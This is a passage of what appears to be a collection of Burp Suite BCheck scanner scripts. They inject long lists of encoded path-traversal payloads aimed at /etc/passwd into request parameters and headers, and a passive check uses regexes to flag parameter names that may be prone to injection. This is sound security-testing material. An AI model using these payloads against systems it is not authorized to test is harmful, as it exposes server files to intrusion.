  4 |     description: "Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application"
  5 |     author: "j3ssie"
  6 |     tags: "lfi", "path-traversal", "injection"
  7 | 
  8 | define:
  9 |     issueDetail = `Path Traversal on Parameter {latest.request.url}`
 10 |     references = `
 11 |     ## References:
 12 |     - https://portswigger.net/web-security/file-path-traversal
 13 |     - https://book.hacktricks.xyz/pentesting-web/file-inclusion
 14 |     - https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html`
 15 |     issueRemediation = `Avoid passing user-supplied input to filesystem APIs altogether
 16 |      {references}`
 17 | 
 18 | run for each:
 19 |     injections =
 20 |         `../..//etc/passwd`,
 21 |         `../../..//etc/passwd`,
 22 |         `../../../..//etc/passwd`,
 23 |         `../../../../..//etc/passwd`,
 24 |         `../../../../../..//etc/passwd`,
 25 |         `../../../../../../../..//etc/passwd`,
 26 |         `..%2f/etc/passwd`,
 27 |         `..%2f..%2f/etc/passwd`,
 28 |         `..%2f..%2f..%2f/etc/passwd`,
 29 |         `..%2f..%2f..%2f..%2f/etc/passwd`,
 30 |         `..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 31 |         `..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 32 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 33 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 34 |         `%2e%2e//etc/passwd`,
 35 |         `%2e%2e/%2e%2e//etc/passwd`,
 36 |         `%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 37 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 38 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 39 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 40 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 41 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 42 |         `%2e%2e%2f/etc/passwd`,
 43 |         `%2e%2e%2f%2e%2e%2f/etc/passwd`,
 44 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 45 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 46 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 47 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 48 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 49 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 50 |         `..%252f/etc/passwd`,
 51 |         `..%252f..%252f/etc/passwd`,
 52 |         `..%252f..%252f..%252f/etc/passwd`,
 53 |         `..%252f..%252f..%252f..%252f/etc/passwd`,
 54 |         `..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 55 |         `..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 56 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 57 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 58 |         `%252e%252e//etc/passwd`,
 59 |         `%252e%252e/%252e%252e//etc/passwd`,
 60 |         `%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 61 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 62 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 63 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 64 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 65 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 66 |         `%252e%252e%252f/etc/passwd`,
 67 |         `%252e%252e%252f%252e%252e%252f/etc/passwd`,
 68 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 69 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 70 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 71 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 72 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 73 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 74 |         `..\/etc/passwd`,
 75 |         `..\..\/etc/passwd`,
 76 |         `..\..\..\/etc/passwd`,
 77 |         `..\..\..\..\/etc/passwd`,
 78 |         `..\..\..\..\..\/etc/passwd`,
 79 |         `..\..\..\..\..\..\/etc/passwd`,
 80 |         `..\..\..\..\..\..\..\/etc/passwd`,
 81 |         `..\..\..\..\..\..\..\..\/etc/passwd`,
 82 |         `..%255c/etc/passwd`,
 83 |         `..%255c..%255c/etc/passwd`,
 84 |         `..%255c..%255c..%255c/etc/passwd`,
 85 |         `..%255c..%255c..%255c..%255c/etc/passwd`,
 86 |         `..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 87 |         `..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 88 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 89 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 90 |         `%252e%252e\/etc/passwd`,
 91 |         `%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd`,
 92 |         `..%5c..%5c/etc/passwd`,
 93 |         `..%5c..%5c..%5c/etc/passwd`,
 94 |         `..%5c..%5c..%5c..%5c/etc/passwd`,
 95 |         `..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 96 |         `..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 97 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 98 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 99 |         `%2e%2e\/etc/passwd`,
100 |         `%2e%2e\%2e%2e\/etc/passwd`,
101 |         `%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
102 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
103 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
104 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
105 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
106 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
107 |         `%2e%2e%5c/etc/passwd`,
108 |         `%2e%2e%5c%2e%2e%5c/etc/passwd`,
109 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
110 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
111 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
112 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
113 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
114 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
115 |         `%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
116 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
117 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
118 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
119 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
120 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
121 |         `%252e%252e%255c/etc/passwd`,
122 |         `%252e%252e%255c%252e%252e%255c/etc/passwd`,
123 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
124 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
125 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
126 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
127 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
128 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`
129 | 
130 | given insertion point then
131 |     send payload called check:
132 |         replacing: {injections}
133 | 
134 |     if {check.response.status_code} is "200" then
135 |         if ("root:" in {check.response.body} and
136 |             "bin/" in {check.response.body}) or
137 |             ("for 16-bit app support" in {check.response.body} or
138 |             "boot loader" in {check.response.body}) then
139 |             report issue:
140 |                 severity: high
141 |                 confidence: firm
142 |                 detail: `{issueDetail}`
143 |         end if
144 |     end if
145 | 


--------------------------------------------------------------------------------
/passives/interesting-parameters.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Interesting Parameters In Request"
  4 |     description: "Identifies typical parameters susceptible to specific vulnerability classes such as IDOR, SQLi, RCE, and more."
  5 |     author: "j3ssie"
  6 |     tags: "passive", "param", "interesting", "noise"
  7 | 
  8 | define:
  9 |     references = `
 10 |     ## References:
 11 |     - https://cheatsheetseries.owasp.org/index.html
 12 |     - https://portswigger.net/burp/documentation/scanner/vulnerabilities-list
 13 |     ## List of rule taking from:
 14 |     - https://github.com/bugcrowd/HUNT/blob/master/Burp/conf/issues.json
 15 |     - https://github.com/1ndianl33t/Gf-Patterns
 16 |     - https://chat.openai.com/
 17 |     `
 18 |     issueRemediation = `Identifies typical parameters susceptible to specific vulnerability classes such as IDOR, SQLi, RCE, and more. Manual Review is recommended.
 19 |     {references}`
 20 | 
 21 | given request then
 22 |     # sqli
 23 |     if {base.request.url.query} matches "\b(?:cat|category|column|comment|delete|email|fetch|field|filter|from|group|id|input|keyword|name|number|order|orderby|param|params|password|post|process|query|report|results|role|row|search|sel|select|sleep|sort|string|table|term|text|title|update|user|username|value|view|where)=\b" or
 24 |         {base.request.body} matches "\b(?:cat|category|column|comment|delete|email|fetch|field|filter|from|group|id|input|keyword|name|number|order|orderby|param|params|password|post|process|query|report|results|role|row|search|sel|select|sleep|sort|string|table|term|text|title|update|user|username|value|view|where)=\b" then
 25 |         report issue and continue:
 26 |             severity: info
 27 |             confidence: tentative
 28 |             detail: `Potential SQL Injection Parameter found at {base.request.url.query}`
 29 |             remediation: `{issueRemediation}`
 30 |     end if
 31 | 
 32 |     # idor
 33 |     if {base.request.url.query} matches "\b(?:account|doc|edit|email|group|guid|hash|id|index|item_id|key|no|number|object_id|order|order_id|post_id|product_id|profile|ref|reference|report|sequence|session_id|session_token|token|user|user_id|uuid)=\b" or
 34 |         {base.request.body} matches "\b(?:account|doc|edit|email|group|guid|hash|id|index|item_id|key|no|number|object_id|order|order_id|post_id|product_id|profile|ref|reference|report|sequence|session_id|session_token|token|user|user_id|uuid)=\b" then
 35 |         report issue and continue:
 36 |             severity: info
 37 |             confidence: tentative
 38 |             detail: `Potential IDOR Parameter found at {base.request.url.query}`
 39 |             remediation: `{issueRemediation}`
 40 |     end if
 41 | 
 42 |     # os command injection
 43 |     if {base.request.url.query} matches "\b(?:arg|args|argument|cli|cmd|code|command|daemon|dir|downloa|download|exec|execute|file|filename|flag|func|functio|input|ip|jump|load|log|module|option|options|param|parameter|params|path|payload|ping|print|process|query|read|reg|req|run|script|scripts|shell)=\b" or
 44 |         {base.request.body} matches "\b(?:arg|args|argument|cli|cmd|code|command|daemon|dir|downloa|download|exec|execute|file|filename|flag|func|functio|input|ip|jump|load|log|module|option|options|param|parameter|params|path|payload|ping|print|process|query|read|reg|req|run|script|scripts|shell)=\b" then
 45 |         report issue and continue:
 46 |             severity: low
 47 |             confidence: tentative
 48 |             detail: `Potential OS Command Injection Parameter found at {base.request.url.query}`
 49 |             remediation: `{issueRemediation}`
 50 |     end if
 51 | 
 52 |     # LFI
 53 |     if {base.request.url.query} matches "\b(?:action|cat|conf|content|date|detail|dir|directory|doc|document|download|file|filename|folder|inc|include|input|layout|locate|location|name|page|path|pdf|php_path|prefix|resource|root|show|site|style|target|template|type|url|view)=\b" or
 54 |         {base.request.body} matches "\b(?:action|cat|conf|content|date|detail|dir|directory|doc|document|download|file|filename|folder|inc|include|input|layout|locate|location|name|page|path|pdf|php_path|prefix|resource|root|show|site|style|target|template|type|url|view)=\b" then
 55 |         report issue and continue:
 56 |             severity: info
 57 |             confidence: tentative
 58 |             detail: `Potential File Inclusion and Path Traversal Parameter found at {base.request.url.query}`
 59 |             remediation: `{issueRemediation}`
 60 |     end if
 61 | 
 62 |     # SSRF
 63 |     if {base.request.url.query} matches "\b(?:access|callback|cfg|clone|continue|create|data|dbg|dest|dir|disable|doc|document|domain|edit|enable|endpoint|exec|execute|feed|fetch|file|filename|folder|grant|host|html|img|link|load|location|make|modify|navigation|next|open|out|page|path|php_path|port|redirect|reference|rename|request|reset|return|root|service|shell|show|site|source|style|target|test|to|toggle|uri|url|val|validate|view|window)=\b" or
 64 |         {base.request.body} matches "\b(?:access|callback|cfg|clone|continue|create|data|dbg|dest|dir|disable|doc|document|domain|edit|enable|endpoint|exec|execute|feed|fetch|file|filename|folder|grant|host|html|img|link|load|location|make|modify|navigation|next|open|out|page|path|php_path|port|redirect|reference|rename|request|reset|return|root|service|shell|show|site|source|style|target|test|to|toggle|uri|url|val|validate|view|window)=\b" then
 65 |         report issue and continue:
 66 |             severity: info
 67 |             confidence: tentative
 68 |             detail: `Potential SSRF Parameter found at {base.request.url.query}`
 69 |             remediation: `{issueRemediation}`
 70 |     end if
 71 | 
 72 |     # SSTI
 73 |     if {base.request.url.query} matches "\b(?:activity|content|data|id|input|layout|name|page|param|preview|redirect|render|template|theme|tpl|view)=\b" or
 74 |         {base.request.body} matches "\b(?:activity|content|data|id|input|layout|name|page|param|preview|redirect|render|template|theme|tpl|view)=\b" then
 75 |         report issue and continue:
 76 |             severity: info
 77 |             confidence: tentative
 78 |             detail: `Potential SSTI Parameter found at {base.request.url.query}`
 79 |             remediation: `{issueRemediation}`
 80 |     end if
 81 | 
 82 |     # Debug
 83 |     if {base.request.url.query} matches "\b(?:access|adm|admin|alter|cfg|clone|config|create|dbg|debug|delete|disable|edit|enable|exec|execute|grant|load|make|modify|rename|reset|root|shell|test|toggle)=\b" or
 84 |         {base.request.body} matches "\b(?:access|adm|admin|alter|cfg|clone|config|create|dbg|debug|delete|disable|edit|enable|exec|execute|grant|load|make|modify|rename|reset|root|shell|test|toggle)=\b" then
 85 |         report issue and continue:
 86 |             severity: info
 87 |             confidence: tentative
 88 |             detail: `Potential Debug Parameter found at {base.request.url.query}`
 89 |             remediation: `{issueRemediation}`
 90 |     end if
 91 | 
 92 |     # open redirect
 93 |     if {base.request.url.query} matches "\b(?:image_url|open|callback|checkout|checkout_url|continue|data|dest|destination|dir|domain|feed|file|file_name|file_url|folder|folder_url|forward|from_url|go|goto|host|html|image_url|img_url|load_file|load_url|login?to|login_url|logout|navigation|next|next_page|out|page|page_url|path|port|redir|redirect|redirect_to|redirect_uri|redirect_url|reference|return|returnto|return_path|return_to|return_url|rt|rurl|show|site|target|to|uri|url|val|validate|view|window)=\b" or
 94 |         {base.request.body} matches "\b(?:image_url|open|callback|checkout|checkout_url|continue|data|dest|destination|dir|domain|feed|file|file_name|file_url|folder|folder_url|forward|from_url|go|goto|host|html|image_url|img_url|load_file|load_url|login?to|login_url|logout|navigation|next|next_page|out|page|page_url|path|port|redir|redirect|redirect_to|redirect_uri|redirect_url|reference|return|returnto|return_path|return_to|return_url|rt|rurl|show|site|target|to|uri|url|val|validate|view|window)=\b" then
 95 |         report issue and continue:
 96 |             severity: info
 97 |             confidence: tentative
 98 |             detail: `Potential Open Redirect Parameter found at {base.request.url.query}`
 99 |             remediation: `{issueRemediation}`
100 |     end if
101 | 
102 |     if {base.request.url.query} matches "(\w+)=(https?://\S+)" or
103 |         {base.request.body} matches "(\w+)=(https?://\S+)" then
104 |         report issue and continue:
105 |             severity: low
106 |             confidence: tentative
107 |             detail: `Potential URL in Parameter found at {base.request.url.query}`
108 |             remediation: `{issueRemediation}`
109 |     end if
110 | 


--------------------------------------------------------------------------------
/vulnerability-classes/path-traversal-on-header.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Path Traversal on Header"
  4 |     description: "Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application"
  5 |     author: "j3ssie"
  6 |     tags: "lfi", "path-traversal", "injection"
  7 | 
  8 | define:
  9 |     issueDetail = `Path Traversal on Header {latest.request.url}`
 10 |     references = `
 11 |     ## References:
 12 |     - https://portswigger.net/web-security/file-path-traversal
 13 |     - https://book.hacktricks.xyz/pentesting-web/file-inclusion
 14 |     - https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html`
 15 |     issueRemediation = `Avoid passing user-supplied input to filesystem APIs altogether
 16 |      {references}`
 17 | 
 18 | run for each:
 19 |     injections =
 20 |         `../..//etc/passwd`,
 21 |         `../../..//etc/passwd`,
 22 |         `../../../..//etc/passwd`,
 23 |         `../../../../..//etc/passwd`,
 24 |         `../../../../../..//etc/passwd`,
 25 |         `../../../../../../../..//etc/passwd`,
 26 |         `..%2f/etc/passwd`,
 27 |         `..%2f..%2f/etc/passwd`,
 28 |         `..%2f..%2f..%2f/etc/passwd`,
 29 |         `..%2f..%2f..%2f..%2f/etc/passwd`,
 30 |         `..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 31 |         `..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 32 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 33 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 34 |         `%2e%2e//etc/passwd`,
 35 |         `%2e%2e/%2e%2e//etc/passwd`,
 36 |         `%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 37 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 38 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 39 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 40 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 41 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 42 |         `%2e%2e%2f/etc/passwd`,
 43 |         `%2e%2e%2f%2e%2e%2f/etc/passwd`,
 44 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 45 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 46 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 47 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 48 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 49 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 50 |         `..%252f/etc/passwd`,
 51 |         `..%252f..%252f/etc/passwd`,
 52 |         `..%252f..%252f..%252f/etc/passwd`,
 53 |         `..%252f..%252f..%252f..%252f/etc/passwd`,
 54 |         `..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 55 |         `..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 56 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 57 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 58 |         `%252e%252e//etc/passwd`,
 59 |         `%252e%252e/%252e%252e//etc/passwd`,
 60 |         `%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 61 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 62 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 63 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 64 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 65 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 66 |         `%252e%252e%252f/etc/passwd`,
 67 |         `%252e%252e%252f%252e%252e%252f/etc/passwd`,
 68 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 69 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 70 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 71 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 72 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 73 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 74 |         `..\/etc/passwd`,
 75 |         `..\..\/etc/passwd`,
 76 |         `..\..\..\/etc/passwd`,
 77 |         `..\..\..\..\/etc/passwd`,
 78 |         `..\..\..\..\..\/etc/passwd`,
 79 |         `..\..\..\..\..\..\/etc/passwd`,
 80 |         `..\..\..\..\..\..\..\/etc/passwd`,
 81 |         `..\..\..\..\..\..\..\..\/etc/passwd`,
 82 |         `..%255c/etc/passwd`,
 83 |         `..%255c..%255c/etc/passwd`,
 84 |         `..%255c..%255c..%255c/etc/passwd`,
 85 |         `..%255c..%255c..%255c..%255c/etc/passwd`,
 86 |         `..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 87 |         `..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 88 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 89 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 90 |         `%252e%252e\/etc/passwd`,
 91 |         `%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd`,
 92 |         `..%5c..%5c/etc/passwd`,
 93 |         `..%5c..%5c..%5c/etc/passwd`,
 94 |         `..%5c..%5c..%5c..%5c/etc/passwd`,
 95 |         `..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 96 |         `..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 97 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 98 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 99 |         `%2e%2e\/etc/passwd`,
100 |         `%2e%2e\%2e%2e\/etc/passwd`,
101 |         `%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
102 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
103 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
104 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
105 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
106 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
107 |         `%2e%2e%5c/etc/passwd`,
108 |         `%2e%2e%5c%2e%2e%5c/etc/passwd`,
109 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
110 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
111 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
112 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
113 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
114 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
115 |         `%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
116 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
117 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
118 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
119 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
120 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
121 |         `%252e%252e%255c/etc/passwd`,
122 |         `%252e%252e%255c%252e%252e%255c/etc/passwd`,
123 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
124 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
125 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
126 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
127 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
128 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`
129 | 
130 |     headerName =
131 |         "Host",
132 |         "Referer",
133 |         "Host",
134 |         "X-Original-URL",
135 |         "Profile",
136 |         "X-Arbitrary",
137 |         "X-HTTP-DestinationURL",
138 |         "X-Forwarded-Proto",
139 |         "Origin",
140 |         "X-Forwarded-Host",
141 |         "X-Forwarded-Server",
142 |         "X-Host",
143 |         "Proxy-Host",
144 |         "Destination",
145 |         "Proxy",
146 |         "Via"
147 | 
148 | given request then
149 |     send request called check:
150 |         headers:
151 |             `{headerName}`: `{injections}`
152 | 
153 |     if {check.response.status_code} is "200" then
154 |         if ("root:" in {check.response.body} and
155 |             "bin/" in {check.response.body}) or
156 |             ("for 16-bit app support" in {check.response.body} or
157 |             "boot loader" in {check.response.body}) then
158 |             report issue:
159 |                 severity: high
160 |                 confidence: firm
161 |                 detail: `{issueDetail}`
162 |         end if
163 |     end if
164 | 


--------------------------------------------------------------------------------
/passives/interesting-error-message.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Interesting Error In Response"
  4 |     description: "Intriguing error response that error worth checking out"
  5 |     author: "j3ssie"
  6 |     tags: "passive", "error", "interesting", "noise"
  7 | 
  8 | define:
  9 |     references = `
 10 |     ## References:
 11 |     - https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html
 12 |     ## List of rule taking from:
 13 |     - https://raw.githubusercontent.com/PortSwigger/error-message-checks/master/src/main/resources/burp/match-rules.tab
 14 |     - https://github.com/1ndianl33t/Gf-Patterns
 15 |     `
 16 |     issueRemediation = `Ensure clear, descriptive error messages with guidance on resolution steps
 17 |     {references}`
 18 |     issueDetail = `Intriguing error response that error worth checking out at {latest.request.url}`
 19 | 
 20 | given response then
 21 |     # interesting debug page
